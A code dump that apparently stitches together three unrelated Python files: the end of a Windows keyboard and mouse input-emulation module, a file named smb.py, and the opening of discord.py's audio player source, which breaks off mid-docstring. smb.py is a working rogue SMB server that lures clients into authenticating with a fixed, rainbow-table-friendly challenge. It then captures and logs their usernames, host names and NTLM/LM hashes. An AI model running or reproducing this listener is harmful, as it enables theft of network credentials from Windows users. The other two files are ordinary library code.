"F2": 0x3C,
"F3": 0x3D,
"F4": 0x3E,
"F5": 0x3F,
"F6": 0x40,
"F7": 0x41,
"F8": 0x42,
"F9": 0x43,
"F10": 0x44,
"F11": 0x57,
"F12": 0x58,
"UP": 0xC8,
"LEFT": 0xCB,
"RIGHT": 0xCD,
"DOWN": 0xD0,
"ESC": 0x01,
"SPACE": 0x39, "SPC": 0x39,
"RETURN": 0x1C, "ENT": 0x1C,
"INSERT": 0xD2, "INS": 0xD2,
"DELETE": 0xD3, "DEL": 0xD3,
"HOME": 0xC7,
"END": 0xCF,
"PRIOR": 0xC9, "PGUP": 0xC9,
"NEXT": 0xD1, "PGDN": 0xD1,
"BACK": 0x0E,
"TAB": 0x0F,
"LCONTROL": 0x1D, "LCTRL": 0x1D,
"RCONTROL": 0x9D, "RCTRL": 0x9D,
"LSHIFT": 0x2A, "LSH": 0x2A,
"RSHIFT": 0x36, "RSH": 0x36,
"LMENU": 0x38, "LALT": 0x38,
"RMENU": 0xB8, "RALT": 0xB8,
"LWIN": 0xDB,
"RWIN": 0xDC,
"APPS": 0xDD,
"CAPITAL": 0x3A, "CAPS": 0x3A,
"NUMLOCK": 0x45, "NUM": 0x45,
"SCROLL": 0x46, "SCR": 0x46,
"MINUS": 0x0C, "MIN": 0x0C,
"LBRACKET": 0x1A, "LBR": 0x1A,
"RBRACKET": 0x1B, "RBR": 0x1B,
"SEMICOLON": 0x27, "SEM": 0x27,
"APOSTROPHE": 0x28, "APO": 0x28,
"GRAVE": 0x29, "GRA": 0x29,
"BACKSLASH": 0x2B, "BSL": 0x2B,
"COMMA": 0x33, "COM": 0x33,
"PERIOD": 0x34, "PER": 0x34,
"SLASH": 0x35, "SLA": 0x35,
}
# virtual keys
vk = {
"1": 0x31,
"2": 0x32,
"3": 0x33,
"4": 0x34,
"5": 0x35,
"6": 0x36,
"7": 0x37,
"8": 0x38,
"9": 0x39,
"0": 0x30,
"NUMPAD1": 0x61, "NP1": 0x61,
"NUMPAD2": 0x62, "NP2": 0x62,
"NUMPAD3": 0x63, "NP3": 0x63,
"NUMPAD4": 0x64, "NP4": 0x64,
"NUMPAD5": 0x65, "NP5": 0x65,
"NUMPAD6": 0x66, "NP6": 0x66,
"NUMPAD7": 0x67, "NP7": 0x67,
"NUMPAD8": 0x68, "NP8": 0x68,
"NUMPAD9": 0x69, "NP9": 0x69,
"NUMPAD0": 0x60, "NP0": 0x60,
"DIVIDE": 0x6F, "NPDV": 0x6F,
"MULTIPLY": 0x6A, "NPM": 0x6A,
"SUBSTRACT": 0x6D, "NPS": 0x6D,
"ADD": 0x6B, "NPA": 0x6B,
"DECIMAL": 0x6E, "NPDC": 0x6E,
"NUMPADENTER": 0x0D, "NPE": 0x0D,
"A": 0x41,
"B": 0x42,
"C": 0x43,
"D": 0x44,
"E": 0x45,
"F": 0x46,
"G": 0x47,
"H": 0x48,
"I": 0x49,
"J": 0x4A,
"K": 0x4B,
"L": 0x4C,
"M": 0x4D,
"N": 0x4E,
"O": 0x4F,
"P": 0x50,
"Q": 0x51,
"R": 0x52,
"S": 0x53,
"T": 0x54,
"U": 0x55,
"V": 0x56,
"W": 0x57,
"X": 0x58,
"Y": 0x59,
"Z": 0x5A,
"F1": 0x70,
"F2": 0x71,
"F3": 0x72,
"F4": 0x73,
"F5": 0x74,
"F6": 0x75,
"F7": 0x76,
"F8": 0x77,
"F9": 0x78,
"F10": 0x79,
"F11": 0x7A,
"F12": 0x7B,
"UP": 0x26,
"LEFT": 0x25,
"RIGHT": 0x27,
"DOWN": 0x28,
"ESC": 0x1B,
"SPACE": 0x20, "SPC": 0x20,
"RETURN": 0x0D, "ENT": 0x0D,
"INSERT": 0x2D, "INS": 0x2D,
"DELETE": 0x2E, "DEL": 0x2E,
"HOME": 0x24,
"END": 0x23,
"PRIOR": 0x21, "PGUP": 0x21,
"NEXT": 0x22, "PGDN": 0x22,
"BACK": 0x08,
"TAB": 0x09,
"LCONTROL": 0xA2, "LCTRL": 0xA2,
"RCONTROL": 0xA3, "RCTRL": 0xA3,
"LSHIFT": 0xA0, "LSH": 0xA0,
"RSHIFT": 0xA1, "RSH": 0xA1,
"LMENU": 0xA4, "LALT": 0xA4,
"RMENU": 0xA5, "RALT": 0xA5,
"LWIN": 0x5B,
"RWIN": 0x5C,
"APPS": 0x5D,
"CAPITAL": 0x14, "CAPS": 0x14,
"NUMLOCK": 0x90, "NUM": 0x90,
"SCROLL": 0x91, "SCR": 0x91,
"MINUS": 0xBD, "MIN": 0xBD,
"LBRACKET": 0xDB, "LBR": 0xDB,
"RBRACKET": 0xDD, "RBR": 0xDD,
"SEMICOLON": 0xBA, "SEM": 0xBA,
"APOSTROPHE": 0xDE, "APO": 0xDE,
"GRAVE": 0xC0, "GRA": 0xC0,
"BACKSLASH": 0xDC, "BSL": 0xDC,
"COMMA": 0xBC, "COM": 0xBC,
"PERIOD": 0xBE, "PER": 0xBE,
"SLASH": 0xBF, "SLA": 0xBF,
}
# setup object
def __init__(self, common = None):
self.keys_worker = KeysWorker(self)
# Thread(target=self.keys_worker.processQueue).start()
self.common = common
if common is None:
self.standalone = True
# parses keys string and adds keys to the queue
def parseKeyString(self, string):
# print keys
if not self.standalone:
self.common.info("Processing keys: %s" % string)
key_queue = []
errors = []
# defaults to direct keys
key_type = self.direct_keys
# split by comma
keys = string.upper().split(",")
# translate
for key in keys:
# up, down or stroke?
up = True
down = True
direction = key.split("_")
subkey = direction[0]
if len(direction) >= 2:
if direction[1] == 'UP':
down = False
else:
up = False
# switch to virtual keys
if subkey == "VK":
key_type = self.virtual_keys
# switch to direct keys
elif subkey == "DK":
key_type = self.direct_keys
# key code
elif subkey.startswith("0x"):
subkey = int(subkey, 16)
if subkey > 0 and subkey < 256:
key_queue.append({
"key": int(subkey),
"okey": subkey,
"time": 0,
"up": up,
"down": down,
"type": key_type,
})
else:
errors.append(key)
# pause
elif subkey.startswith("-"):
time = float(subkey.replace("-", ""))/1000
if time > 0 and time <= 10:
key_queue.append({
"key": None,
"okey": "",
"time": time,
"up": False,
"down": False,
"type": None,
})
else:
errors.append(key)
# direct key
elif key_type == self.direct_keys and subkey in self.dk:
key_queue.append({
"key": self.dk[subkey],
"okey": subkey,
"time": 0,
"up": up,
"down": down,
"type": key_type,
})
# virtual key
elif key_type == self.virtual_keys and subkey in self.vk:
key_queue.append({
"key": self.vk[subkey],
"okey": subkey,
"time": 0,
"up": up,
"down": down,
"type": key_type,
})
# no match?
else:
errors.append(key)
# if there are errors, do not process keys
if len(errors):
return errors
# create new thread if there is no active one
if self.keys_process is None or not self.keys_process.isAlive():
self.keys_process = Thread(target=self.keys_worker.processQueue)
self.keys_process.start()
# add keys to queue
for i in key_queue:
self.keys_worker.key_queue.put(i)
self.keys_worker.key_queue.put(None)
return True
# direct key press
def directKey(self, key, direction = None, type = None):
if type is None:
type = self.direct_keys
if direction is None:
direction = self.key_press
if key.startswith("0x"):
key = int(key, 16)
else:
key = key.upper()
lookup_table = self.dk if type == self.direct_keys else self.vk
key = lookup_table[key] if key in lookup_table else 0x0000
self.keys_worker.sendKey(key, direction | type)
# direct mouse move or button press
def directMouse(self, dx = 0, dy = 0, buttons = 0):
self.keys_worker.sendMouse(dx, dy, buttons)
# threaded sending keys class
class KeysWorker():
# keys object
keys = None
# queue of keys
key_queue = Queue()
# init
def __init__(self, keys):
self.keys = keys
# main function, process key's queue in loop
def processQueue(self):
# endless loop
while True:
# get one key
key = self.key_queue.get()
# terminate process if queue is empty
if key is None:
self.key_queue.task_done()
if self.key_queue.empty():
return
continue
# print key
elif not self.keys.standalone:
self.keys.common.info("Key: \033[1;35m%s/%s\033[0;37m, duration: \033[1;35m%f\033[0;37m, direction: \033[1;35m%s\033[0;37m, type: \033[1;35m%s" % (
key["okey"] if key["okey"] else "None",
key["key"], key["time"],
"UP" if key["up"] and not key["down"] else "DOWN" if not key["up"] and key["down"] else "BOTH" if key["up"] and key["down"] else "NONE",
"None" if key["type"] is None else "DK" if key["type"] == self.keys.direct_keys else "VK"), "\033[0;35mKEY: \033[0;37m"
)
# if it's a key
if key["key"]:
# press
if key["down"]:
self.sendKey(key["key"], self.keys.key_press | key["type"])
# wait
sleep(key["time"])
# and release
if key["up"]:
self.sendKey(key["key"], self.keys.key_release | key["type"])
# not an actual key, just pause
else:
sleep(key["time"])
# mark as done (decrement internal queue counter)
self.key_queue.task_done()
# send key
def sendKey(self, key, type):
self.SendInput(self.Keyboard(key, type))
# send mouse
def sendMouse(self, dx, dy, buttons):
if dx != 0 or dy != 0:
buttons |= self.keys.mouse_move
self.SendInput(self.Mouse(buttons, dx, dy))
# send input
def SendInput(self, *inputs):
nInputs = len(inputs)
LPINPUT = INPUT * nInputs
pInputs = LPINPUT(*inputs)
cbSize = ctypes.c_int(ctypes.sizeof(INPUT))
return ctypes.windll.user32.SendInput(nInputs, pInputs, cbSize)
# get input object
def Input(self, structure):
if isinstance(structure, MOUSEINPUT):
return INPUT(0, _INPUTunion(mi=structure))
if isinstance(structure, KEYBDINPUT):
return INPUT(1, _INPUTunion(ki=structure))
if isinstance(structure, HARDWAREINPUT):
return INPUT(2, _INPUTunion(hi=structure))
raise TypeError('Cannot create INPUT structure!')
# mouse input
def MouseInput(self, flags, x, y, data):
return MOUSEINPUT(x, y, data, flags, 0, None)
# keyboard input
def KeybdInput(self, code, flags):
return KEYBDINPUT(code, code, flags, 0, None)
# hardware input
def HardwareInput(self, message, parameter):
return HARDWAREINPUT(message & 0xFFFFFFFF,
parameter & 0xFFFF,
parameter >> 16 & 0xFFFF)
# mouse object
def Mouse(self, flags, x=0, y=0, data=0):
return self.Input(self.MouseInput(flags, x, y, data))
# keyboard object
def Keyboard(self, code, flags=0):
return self.Input(self.KeybdInput(code, flags))
# hardware object
def Hardware(self, message, parameter=0):
return self.Input(self.HardwareInput(message, parameter))
# types
LONG = ctypes.c_long
DWORD = ctypes.c_ulong
ULONG_PTR = ctypes.POINTER(DWORD)
WORD = ctypes.c_ushort
class MOUSEINPUT(ctypes.Structure):
_fields_ = (('dx', LONG),
('dy', LONG),
('mouseData', DWORD),
('dwFlags', DWORD),
('time', DWORD),
('dwExtraInfo', ULONG_PTR))
class KEYBDINPUT(ctypes.Structure):
_fields_ = (('wVk', WORD),
('wScan', WORD),
('dwFlags', DWORD),
('time', DWORD),
('dwExtraInfo', ULONG_PTR))
class HARDWAREINPUT(ctypes.Structure):
_fields_ = (('uMsg', DWORD),
('wParamL', WORD),
('wParamH', WORD))
class _INPUTunion(ctypes.Union):
_fields_ = (('mi', MOUSEINPUT),
('ki', KEYBDINPUT),
('hi', HARDWAREINPUT))
class INPUT(ctypes.Structure):
_fields_ = (('type', DWORD),
('union', _INPUTunion))
#example:
if __name__ == '__main__':
sleep(3)
keys = Keys()
# mouse movement
for i in range(100):
keys.directMouse(-1*i, 0)
sleep(0.004)
# mouse keys
keys.directMouse(buttons=keys.mouse_rb_press)
sleep(0.5)
keys.directMouse(buttons=keys.mouse_lb_press)
sleep(2)
keys.directMouse(buttons=keys.mouse_lb_release)
sleep(0.5)
keys.directMouse(buttons=keys.mouse_rb_release)
# or
keys.directMouse(buttons=keys.mouse_lb_press | keys.mouse_rb_press)
sleep(2)
keys.directMouse(buttons=keys.mouse_lb_release | keys.mouse_rb_release)
# keyboard (direct keys)
keys.directKey("a")
sleep(0.04)
keys.directKey("a", keys.key_release)
# keyboard (virtual keys)
keys.directKey("a", type=keys.virtual_keys)
sleep(0.04)
keys.directKey("a", keys.key_release, keys.virtual_keys)
# queue of keys (direct keys, threaded, only for keybord input)
keys.parseKeyString("a_down,-4,a_up,0x01") # -4 - pause for 4 ms, 0x00 - hex code of Esc
# queue of keys (virtual keys, threaded, only for keybord input)
keys.parseKeyString("vk,a_down,-4,a_up") # -4 - pause for 4 ms |
smb.py | import socket
import struct
import sys
import util
from threading import Thread
from service import Service
class smb(Service):
def __init__(self):
super(smb, self).__init__('SMB Service')
self.config['port'].value = 445
self.captured_hashes = {}
self.info = """
SMB listener for harvesting NTLM/LM hashes.
Authentication requests use the standard challenge of
1122334455667788, for which plenty of generated rainbow
tables exist already.
"""
# parse NTLM/LM hashes
# scapy has very limited SMB packet support, so we have to do this manually
def parse_credentials(self, data):
# offsets based on security blob starting at data[59]
data = data[59:]
lm_offset = struct.unpack('<I', data[16:20])[0]
ntlm_offset = struct.unpack('<I', data[24:28])[0]
name_length = struct.unpack('<h', data[36:38])[0]
name_offset = struct.unpack('<I', data[40:44])[0]
host_length = struct.unpack('<h', data[46:48])[0]
host_offset = struct.unpack('<I', data[48:52])[0]
lm_hash = ntlm_hash = ''
# LM hash
for i in data[lm_offset:lm_offset + 24]:
tmp = str(hex(ord(i))).replace('0x', '')
if len(tmp) is 1:
# hex() removes leading 0's in hex; we need them.
tmp = '0' + tmp
lm_hash += tmp
# NTLM hash
for i in data[ntlm_offset:ntlm_offset + 24]:
tmp = str(hex(ord(i))).replace('0x', '')
if len(tmp) is 1:
tmp = '0' + tmp
ntlm_hash += tmp
# host name
hname = ''
for i in range(host_offset, (host_offset + host_length)):
tmp = struct.unpack('<c', data[i])[0]
if tmp is '\x00':
continue
hname += tmp
if name_length > 100:
# sanity
return
# user name
uname = ''
for i in range(name_offset, (name_offset + name_length)):
tmp = struct.unpack('<c', data[i])[0]
if tmp is '\x00':
# null bytes
continue
uname += tmp
# add the username and build the list
# list consists of
# HOST NAME
# LM HASH
# NTLM HASH
if not uname in self.captured_hashes:
tmp = [hname, lm_hash.upper(), ntlm_hash.upper()]
self.captured_hashes[uname] = tmp
data = 'Username: %s\nHost: %s\nLM: %s\nNTLM: %s\nChallenge: %s\n' \
% (uname, hname, lm_hash.upper(),
ntlm_hash.upper(), '1122334455667788')
self.log_msg(data)
# get packet payload
def get_payload(self, data):
hexcode = str(hex(ord(data[4])))
if hexcode == '0x72':
# Build the payload for a Negotiate Protocol Response
# netbios
payload = "\x00\x00\x00\x55"
# smb header
payload += "\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x98\x53\xc8"
payload += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
payload += "\xff\xff\xff\xfe\x00\x00\x00\x00"
# negotiate protocol response
payload += "\x11\x05\x00\x03\x0a\x00\x01\x00\x04\x11\x00\x00"
payload += "\x00\x00\x01\x00\x00\x00\x00\x00\xfd\xe3\x00\x80"
payload += "\x11\xb9\x14\xe4\x77\xc8\xcd\x01\x68\x01\x00\x10"
payload += "\x00\xb5\x9b\x73\x9d\xb7\xc2\xb7\x40\x83\xd6\x52"
payload += "\x31\xec\xb3\x84\x53"
return (payload, 0)
elif hexcode == '0x73':
# check if its a NEGOTIATE or AUTH
message_type = str(hex(ord(data[67])))
if message_type == '0x1':
# Build the payload for a NTLMSSP_CHALLENGE
# netbios
payload = "\x00\x00\x00\xdd"
# smb header
payload += "\xff\x53\x4d\x42\x73\x16"
payload += "\x00\x00\xc0\x98\x07\xc8\x00\x00\x00\x00\x00"
payload += "\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
payload += "\x00\x08\x10\x00"
# session setup andx response, error more processing
payload += "\x04\xff\x00\xdd\x00\x00\x00\x68\x00\xb2\x00"
payload += "\x4e\x54\x4c\x4d\x53\x53\x50\x00\x02\x00\x00"
payload += "\x00\x04\x00\x04\x00\x38\x00\x00\x00\x15\x82"
payload += "\x8a\xe2\x11\x22\x33\x44\x55\x66\x77\x88\x00" #ntlm challenge 1122334455667788
payload += "\x00\x00\x00\x00\x00\x00\x00\x2c\x00\x2c\x00"
payload += "\x3c\x00\x00\x00\x05\x01\x28\x0a\x00\x00\x00"
payload += "\x0f\x4e\x00\x4f\x00\x02\x00\x04\x00\x4e\x00"
payload += "\x4f\x00\x01\x00\x04\x00\x4e\x00\x4f\x00\x04"
payload += "\x00\x04\x00\x6e\x00\x6f\x00\x03\x00\x04\x00"
payload += "\x6e\x00\x6f\x00\x06\x00\x04\x00\x01\x00\x00"
payload += "\x00\x00\x00\x00\x00\x00\x57\x00\x69\x00\x6e"
payload += "\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00"
payload += "\x35\x00\x2e\x00\x31\x00\x00\x00\x57\x00\x69"
payload += "\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00"
payload += "\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20"
payload += "\x00\x4c\x00\x41\x00\x4e\x00\x20\x00\x4d\x00"
payload += "\x61\x00\x6e\x00\x61\x00\x67\x00\x65\x00\x72"
payload += "\x00\x00"
return (payload, 0)
elif message_type == '0x3':
# should be an AUTH packet
# parse credentials
self.parse_credentials(data)
# send a STATUS_LOGIN_FAILURE
# netbios
payload = "\x00\x00\x00\x23"
# smb header
payload += "\xff\x53\x4d\x42\x73\x6d\x00\x00\xc0\x98\x07"
payload += "\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
payload += "\x00\x00\xff\xff\xff\xfe\x00\x08\x20\x00"
# session setup andx response, status_login_failure
payload += "\x00\x00\x00"
return (payload, 1)
else:
return (None, 1)
# dbg -- dump the packet
def dbg_dump(self, data):
cnt = 0
for i in data:
sys.stdout.write(str(hex(ord(i))) + ' ')
cnt += 1
if cnt % 16 == 0:
print ''
cnt = 0
print ''
# handle packets
def handler(self, con, data):
try:
if len(data) > 4:
data = data[4:]
(payload, err) = self.get_payload(data)
if not payload is None and err is 0:
con.send(payload)
elif not payload is None and err is 1:
con.send(payload)
return False
else:
return False
except Exception, j:
util.Error('SMB error: %s' % j)
return False
return True
# threaded init
def initialize_bg(self):
util.Msg('Starting SMB listener...')
thread = Thread(target=self.initialize)
thread.start()
return True
# initialize SMB listener
def initialize(self):
socker = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socker.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
socker.settimeout(3)
socker.bind(('', self.config['port'].value))
socker.listen(5)
self.running = True
try:
while self.running:
try:
con, addr = socker.accept()
except KeyboardInterrupt:
break
except:
continue
self.log_msg('Connection from %s' % addr[0])
while self.running:
data = con.recv(256)
if not self.handler(con, data):
break
con.shutdown(socket.SHUT_RDWR)
con.close()
self.log_msg('Closed connection with %s.\n' % addr[0])
except KeyboardInterrupt:
self.running = False
except socket.error:
pass
except Exception, j:
util.Error('Error with SMB listener: %s' % j)
self.running = False
socker.close()
util.debug('SMB listener shutdown.')
def cli(self, parser):
""" initialize CLI options
"""
parser.add_argument('--smb', help='SMB Service', action='store_true',
default=False, dest=self.which)
|
player.py | """
The MIT License (MIT)
Copyright (c) 2015-2021 Rapptz 2021-present CuzImSyntax
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
from __future__ import annotations
import threading
import traceback
import subprocess
import audioop
import asyncio
import logging
import shlex
import time
import json
import sys
import re
import io
from typing import Any, Callable, Generic, IO, Optional, TYPE_CHECKING, Tuple, Type, TypeVar, Union
from .errors import ClientException
from .opus import Encoder as OpusEncoder
from .oggparse import OggStream
from .utils import MISSING
if TYPE_CHECKING:
from .voice_client import VoiceClient
AT = TypeVar('AT', bound='AudioSource')
FT = TypeVar('FT', bound='FFmpegOpusAudio')
_log = logging.getLogger(__name__)
__all__ = (
'AudioSource',
'PCMAudio',
'FFmpegAudio',
'FFmpegPCMAudio',
'FFmpegOpusAudio',
'PCMVolumeTransformer',
)
CREATE_NO_WINDOW: int
if sys.platform != 'win32':
CREATE_NO_WINDOW = 0
else:
CREATE_NO_WINDOW = 0x08000000
class AudioSource:
"""Represents an audio stream.
The audio stream can be Opus encoded or not, however if the audio stream
is not Opus encoded then the audio format must be 16-bit 48KHz stereo PCM.
.. warning::
The audio source reads are done in a separate thread.
"""
def read(self) -> bytes:
"""Reads 20ms worth of audio.
Subclasses must implement this.
If the audio is complete, then returning an empty
:term:`py:bytes-like object` to signal this is the way to do so.
If :meth:`~AudioSource.is_opus` method returns ``True``, then it must return
20ms worth of Opus encoded audio. Otherwise, it must be 20ms
worth of 16-bit 48KHz stereo PCM, which is about 3,840 bytes
per frame (20ms worth of audio).
Returns
--------
:class:`bytes`
A bytes like object that represents the PCM or Opus data.
"""
raise NotImplementedError
def is_opus(self) -> bool:
"""Checks if the audio source is already encoded in Opus."""
return False
def cleanup(self) -> None:
"""Called when clean-up is needed to be done.
Useful for clearing buffer data or processes after
it is done playing audio.
"""
pass
def __del__(self) -> None:
self.cleanup()
class PCMAudio(AudioSource):
"""Represents raw 16-bit 48KHz stereo PCM audio source.
Attributes
-----------
stream: :term:`py:file object`
A file-like object that reads byte data representing raw PCM.
"""
def __init__(self, stream: io.BufferedIOBase) -> None:
self.stream: io.BufferedIOBase = stream
def read(self) -> bytes:
ret = self.stream.read(OpusEncoder.FRAME_SIZE)
if len(ret) != OpusEncoder.FRAME_SIZE:
return b''
return ret
class FFmpegAudio(AudioSource):
"""Represents an FFmpeg (or AVConv) based AudioSource.
User created AudioSources using FFmpeg differently from how :class:`FFmpegPCMAudio` and
:class:`FFmpegOpusAudio` work should subclass this.
.. versionadded:: 1.3
"""
def __init__(self, source: Union[str, io.BufferedIOBase], *, executable: str = 'ffmpeg', args: Any, **subprocess_kwargs: Any):
piping = subprocess_kwargs.get('stdin') == subprocess.PIPE
if piping and isinstance(source, str):
raise TypeError("parameter conflict: 'source' parameter cannot be a string when piping to stdin")
args = [executable, *args]
kwargs = {'stdout': subprocess.PIPE}
kwargs.update(subprocess_kwargs)
self._process: subprocess.Popen = self._spawn_process(args, **kwargs)
self._stdout: IO[bytes] = self._process.stdout # type: ignore
self._stdin: Optional[IO[Bytes]] = None
self._pipe_thread: Optional[threading.Thread] = None
if piping:
n = f'popen-stdin-writer:{id(self):#x}'
self._stdin = self._process.stdin
self._pipe_thread = threading.Thread(target=self._pipe_writer, args=(source,), daemon=True, name=n)
self._pipe_thread.start()
def _spawn_process(self, args: Any, **subprocess_kwargs: Any) -> subprocess.Popen:
process = None
try:
process = subprocess.Popen(args, creationflags=CREATE_NO_WINDOW, **subprocess_kwargs)
except FileNotFoundError:
executable = args.partition(' ')[0] if isinstance(args, str) else args[0]
raise ClientException(executable + ' was not found.') from None
except subprocess.SubprocessError as exc:
raise ClientException(f'Popen failed: {exc.__class__.__name__}: {exc}') from exc
else:
return process
def _kill_process(self) -> None:
proc = self._process
if proc is MISSING:
return
_log.info('Preparing to terminate ffmpeg process %s.', proc.pid)
try:
proc.kill()
except Exception:
_log.exception('Ignoring error attempting to kill ffmpeg process %s', proc.pid)
if proc.poll() is None:
_log.info('ffmpeg process %s has not terminated. Waiting to terminate...', proc.pid)
proc.communicate()
_log.info('ffmpeg process %s should have terminated with a return code of %s.', proc.pid, proc.returncode)
else:
_log.info('ffmpeg process %s successfully terminated with return code of %s.', proc.pid, proc.returncode)
def _pipe_writer(self, source: io.BufferedIOBase) -> None:
while self._process:
# arbitrarily large read size
data = source.read(8192)
if not data:
self._process.terminate()
return
try:
self._stdin.write(data)
except Exception:
_log.debug('Write error for %s, this is probably not a problem', self, exc_info=True)
# at this point the source data is either exhausted or the process is fubar
self._process.terminate()
return
def cleanup(self) -> None:
self._kill_process()
self._process = self._stdout = self._stdin = MISSING
class FFmpegPCMAudio(FFmpegAudio):
"""An audio source from FFmpeg (or AVConv).
This launches a sub-process to a specific input file given.
.. warning::
You must have the ffmpeg or avconv executable in your path environment
variable in order for this to work.
Parameters
------------
source: Union[:class:`str`, :class:`io.BufferedIOBase`]
The input that ffmpeg will take and convert to PCM bytes.
If ``pipe`` is ``True`` then this is a file-like object that is
passed to the stdin of ffmpeg.
executable: :class:`str`
The executable name (and path) to use. Defaults to ``ffmpeg``.
pipe: :class:`bool`
If ``True``, denotes that ``source`` parameter will be passed
to the stdin of ffmpeg. Defaults to ``False``.
stderr: Optional[:term:`py:file object`]
A file-like object to pass to the Popen constructor.
Could also be an instance of ``subprocess.PIPE``.
before_options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg before the ``-i`` flag.
options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg after the ``-i`` flag.
Raises
--------
ClientException
The subprocess failed to be created.
"""
def __init__(
self,
source: Union[str, io.BufferedIOBase],
*,
executable: str = 'ffmpeg',
pipe: bool = False,
stderr: Optional[IO[str]] = None,
before_options: Optional[str] = None,
options: Optional[str] = None
) -> None:
args = []
subprocess_kwargs = {'stdin': subprocess.PIPE if pipe else subprocess.DEVNULL, 'stderr': stderr}
if isinstance(before_options, str):
args.extend(shlex.split(before_options))
args.append('-i')
args.append('-' if pipe else source)
args.extend(('-f', 's16le', '-ar', '48000', '-ac', '2', '-loglevel', 'warning'))
if isinstance(options, str):
args.extend(shlex.split(options))
args.append('pipe:1')
super().__init__(source, executable=executable, args=args, **subprocess_kwargs)
def read(self) -> bytes:
ret = self._stdout.read(OpusEncoder.FRAME_SIZE)
if len(ret) != OpusEncoder.FRAME_SIZE:
return b''
return ret
def is_opus(self) -> bool:
return False
class FFmpegOpusAudio(FFmpegAudio):
"""An audio source from FFmpeg (or AVConv).
This launches a sub-process to a specific input file given. However, rather than
producing PCM packets like :class:`FFmpegPCMAudio` does that need to be encoded to
Opus, this class produces Opus packets, skipping the encoding step done by the library.
Alternatively, instead of instantiating this class directly, you can use
:meth:`FFmpegOpusAudio.from_probe` to probe for bitrate and codec information. This
can be used to opportunistically skip pointless re-encoding of existing Opus audio data
for a boost in performance at the cost of a short initial delay to gather the information.
The same can be achieved by passing ``copy`` to the ``codec`` parameter, but only if you
know that the input source is Opus encoded beforehand.
.. versionadded:: 1.3
.. warning::
You must have the ffmpeg or avconv executable in your path environment
variable in order for this to work.
Parameters
------------
source: Union[:class:`str`, :class:`io.BufferedIOBase`]
The input that ffmpeg will take and convert to Opus bytes.
If ``pipe`` is ``True`` then this is a file-like object that is
passed to the stdin of ffmpeg.
bitrate: :class:`int`
The bitrate in kbps to encode the output to. Defaults to ``128``.
codec: Optional[:class:`str`]
The codec to use to encode the audio data. Normally this would be
just ``libopus``, but is used by :meth:`FFmpegOpusAudio.from_probe` to
opportunistically skip pointlessly re-encoding Opus audio data by passing
``copy`` as the codec value. Any values other than ``copy``, ``opus``, or
``libopus`` will be considered ``libopus``. Defaults to ``libopus``.
.. warning::
Do not provide this parameter unless you are certain that the audio input is
already Opus encoded. For typical use :meth:`FFmpegOpusAudio.from_probe`
should be used to determine the proper value for this parameter.
executable: :class:`str`
The executable name (and path) to use. Defaults to ``ffmpeg``.
pipe: :class:`bool`
If ``True``, denotes that ``source`` parameter will be passed
to the stdin of ffmpeg. Defaults to ``False``.
stderr: Optional[:term:`py:file object`]
A file-like object to pass to the Popen constructor.
Could also be an instance of ``subprocess.PIPE``.
before_options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg before the ``-i`` flag.
options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg after the ``-i`` flag.
Raises
--------
ClientException
The subprocess failed to be created.
"""
def __init__(
self,
source: Union[str, io.BufferedIOBase],
*,
bitrate: int = 128,
codec: Optional[str] = None,
executable: str = 'ffmpeg',
pipe=False,
stderr=None,
before_options=None,
options=None,
) -> None:
args = []
subprocess_kwargs = {'stdin': subprocess.PIPE if pipe else subprocess.DEVNULL, 'stderr': stderr}
if isinstance(before_options, str):
args.extend(shlex.split(before_options))
args.append('-i')
args.append('-' if pipe else source)
codec = 'copy' if codec in ('opus', 'libopus') else 'libopus'
args.extend(('-map_metadata', '-1',
'-f', 'opus',
'-c:a', codec,
'-ar', '48000',
'-ac', '2',
'-b:a', f'{bitrate}k',
'-loglevel', 'warning'))
if isinstance(options, str):
args.extend(shlex.split(options))
args.append('pipe:1')
super().__init__(source, executable=executable, args=args, **subprocess_kwargs)
self._packet_iter = OggStream(self._stdout).iter_packets()
@classmethod
async def from_probe(
cls: Type[FT],
source: str,
*,
method: Optional[Union[str, Callable[[str, str], Tuple[Optional[str], Optional[int]]]]] = None,
**kwargs: Any,
) -> FT:
"""|coro|
A factory method that creates a :class:`FFmpegOpusAudio` after probing
the input source for audio codec and bitrate information.
Examples
----------
Use this function to create an :class:`FFmpegOpusAudio` instance instead of the constructor: ::
source = await discord.FFmpegOpusAudio.from_probe("song.webm")
voice_client.play(source)
If you are on Windows and don't have ffprobe installed, use the ``fallback`` method
to probe using ffmpeg instead: ::
source = await discord.FFmpegOpusAudio.from_probe("song.webm", method='fallback')
voice_client.play(source)
Using a custom method of determining codec and bitrate: ::
def custom_probe(source, executable):
# some analysis code here
return codec, bitrate
source = await discord.FFmpegOpusAudio.from_probe("song.webm", method=custom_probe)
voice_client.play(source)
Parameters
------------
source
Identical to the ``source`` parameter for the constructor.
method: Optional[Union[:class:`str`, Callable[:class:`str`, :class:`str`]]]
The probing method used to determine bitrate and codec information. As a string, valid
values are ``native`` to use ffprobe (or avprobe) and ``fallback`` to use ffmpeg
